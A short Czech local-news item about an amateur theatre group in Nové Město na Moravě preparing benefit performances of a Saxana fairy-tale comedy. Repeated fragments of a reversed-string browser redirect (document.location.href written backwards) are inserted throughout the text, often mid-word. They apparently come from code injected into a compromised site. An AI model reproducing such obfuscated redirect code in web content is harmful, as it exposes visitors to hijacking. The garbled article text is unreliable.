Rainbow page separator

Ochotníci z Novoměstska opět chystají benefiční představení

Úterý, 19. března 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / I při své v pořadí páté divadelní sezoně hodlá novoměstský spolek Ochotníci z Novoměstska uspořádat tradiční benefiční představení. Každoročně herci odehrají dvě – jedno pro Domácí hospic Vysočina, výtěžek druhého je věnován sdružení Usměváčci, které se stará o trávení volného času postižených dětí.
Pro le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní divadelní sezonu Ochotníci z Novoměstska nacvičili známou pohádkovou komedii o mladé čarodějnici Saxaně, která uteče z pohádkové říše a seznámí se s dobrem i zlem v lidském světě. Chybět pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nemohou ani triky a kouzla.
Premiéra se uskuteční 30. března od 18 hodin v kulturním domě v Novém Městě, v dalších dnech divadelníci ve městě odehrají ještě dalších pět repríz. Zatímco le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos se herci zaměřili na Dívku na koštěti, v předchozích sezonách taktéž sáhli mezi osvědčené kusy a bavili diváky komediemi Bylo nás pět, Jak u[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topit dok[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tora Mráčka, Trhák a Čtyři vraždy stačí, drahoušku.